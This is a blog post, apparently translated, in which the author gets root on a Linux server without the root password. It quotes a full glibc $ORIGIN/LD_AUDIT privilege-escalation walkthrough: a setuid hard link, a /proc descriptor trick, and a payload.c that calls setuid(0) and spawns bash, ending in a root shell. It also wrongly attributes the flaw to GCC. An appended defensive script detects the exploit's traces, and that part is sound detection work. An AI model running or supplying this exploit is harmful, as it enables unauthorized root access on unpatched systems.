Linux 2.6 kernel local privilege escalation: getting root from a low-privilege account

Preface: er, the PHP version on a Linux server was too old and had to be upgraded before the ThinkPHP framework could be used, but I didn't have the root password, so I couldn't upgrade. Although the server is in a virtual cluster, I didn't have the cluster password either. Resetting the root password by editing the boot entry would have been, first, too much hassle and, second, er, too low-tech. After some searching on Baidu and Google I found that the 2.6 kernel has a vulnerability, and after N failed attempts I finally found a tool that worked. The procedure is as follows. Magically turning $ into #

I don't really understand what it means either; straight to the code:


It is possible to exploit this flaw to execute arbitrary code as root.

Please note, this is a low impact vulnerability that is only of interest to
security professionals and system administrators. End users do not need
to be concerned.

Exploitation would look like the following.

# Create a directory in /tmp we can control.
$ mkdir /tmp/exploit

# Link to an suid binary, thus changing the definition of $ORIGIN.
$ ln /bin/ping /tmp/exploit/target

# Open a file descriptor to the target binary (note: some users are surprised
# to learn exec can be used to manipulate the redirections of the current
# shell if a command is not specified. This is what is happening below).
$ exec 3< /tmp/exploit/target

# This descriptor should now be accessible via /proc.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*

# Remove the directory previously created
$ rm -rf /tmp/exploit/

# The /proc link should still exist, but now will be marked deleted.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)

# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().

$ cat > payload.c
void __attribute__((constructor)) init()
{
        setuid(0);
        system("/bin/bash");
}
# (press Enter here)
# (press Ctrl+C here to finish)


$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*

# Now force the link in /proc to load $ORIGIN via LD_AUDIT.
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=500(taviso)

Fix for the vulnerability (this is a vulnerability caused by GCC):
Upgrade: glibc
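A defender-side check added here (it is not part of the original post or of the advisory it quotes): the walkthrough above leaves two characteristic traces on a host, a process holding an open descriptor to an already deleted file under /tmp, and a hard link to a setuid binary sitting in a world-writable directory. The script below flags both. The /proc sample lines are constructed for the example, the set of world-writable directories it watches is an assumption, and it relies on the `name -> target` layout that `ls -ld` prints for symlinks.

```shell
#!/bin/sh
# Constructed sample of `ls -ld /proc/<pid>/fd/<n>` output (not from a real host).
# The first line mirrors the "(deleted)" state shown in the walkthrough above.
SAMPLE_FDS='lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)
lrwx------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/0 -> /dev/pts/2
lr-x------ 1 www    www    64 Oct 15 09:25 /proc/2200/fd/5 -> /var/log/app.log (deleted)
lr-x------ 1 bob    bob    64 Oct 15 09:30 /proc/3000/fd/4 -> /var/tmp/x/ping (deleted)'

# Reads `ls -ld` lines for /proc fd symlinks on stdin and prints "pid target"
# for every descriptor whose backing file is already deleted and lived under a
# world-writable directory (assumed list: /tmp, /var/tmp, /dev/shm). A deleted
# file under /var/log is ordinary log rotation and is not reported.
suspicious_deleted_fds() {
    awk '
        /\(deleted\)$/ {
            link = ""; target = ""
            for (i = 1; i <= NF; i++)
                if ($i == "->") { link = $(i - 1); target = $(i + 1) }
            if (target ~ /^\/(tmp|var\/tmp|dev\/shm)\//) {
                split(link, p, "/")        # /proc/<pid>/fd/<n>: p[3] is the pid
                print p[3], target
            }
        }'
}

# Live scan: every descriptor of every process through the same filter.
# -d keeps ls from descending into descriptors that point at directories.
# Needs root to see other users' descriptors.
scan_live_fds() {
    ls -ld /proc/[0-9]*/fd/* 2>/dev/null | suspicious_deleted_fds
}

# Hard links to setuid binaries in world-writable directories are the other
# trace; -links +1 (POSIX find) reports files with more than one link.
find_suid_hardlinks() {
    find /tmp /var/tmp /dev/shm -xdev -type f -perm -4000 -links +1 2>/dev/null
}

# Run with --live to scan the current host instead of the constructed sample.
if [ "${1:-}" = "--live" ]; then
    scan_live_fds
    find_suid_hardlinks
fi
```

Run as root from cron or an agent; any line it prints names a process (or a file) worth inspecting, and on a patched host an empty result is the expected state.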

